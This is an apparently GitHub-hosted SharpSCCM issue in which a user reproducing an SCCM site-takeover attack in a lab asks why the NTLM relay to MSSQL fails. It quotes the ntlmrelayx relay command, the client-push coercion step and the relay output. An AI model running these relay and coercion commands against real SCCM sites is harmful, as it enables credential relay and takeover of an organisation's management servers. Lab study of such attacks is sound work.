Mayyhem/SharpSCCM

SCCM Site-takeover authentication issue

PaulDHaes opened this issue · 0 comments

Hi,
Sorry if this is not the place, but I have a question related to the site-takeover method used in the 2023 video.
I created the same lab environment with the help of the Office 365 deployment lab kit and did not touch any setting related to those machines.
When I try to execute the invoke client-push -t _relay-server-ip_, I see in my ntlmrelayx that the authentication failed:

[*] SMBD-Thread-908 (process_request_thread): Received connection from _relay-target-ip_, attacking target mssql://_relay-target-ip_
[-] ERROR(CM1): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
[-] Authenticating against mssql://_relay-target-ip_ as CORP/CM1$ FAILED

To start ntlmrelayx I use this command:
ntlmrelayx.py -smb2support -ip _relay-server-ip_ -t "mssql://_relay-target-ip_ " -socks

I checked whether the MS-SQL service is running, which it is, and confirmed it with
mssqlclient.py "CORP/LabAdmin"@"CM1.corp.contoso.com" -windows-auth
logged in as the default user account.
Any idea how to fix it? Did you guys maybe enable an extra setting to let it authenticate?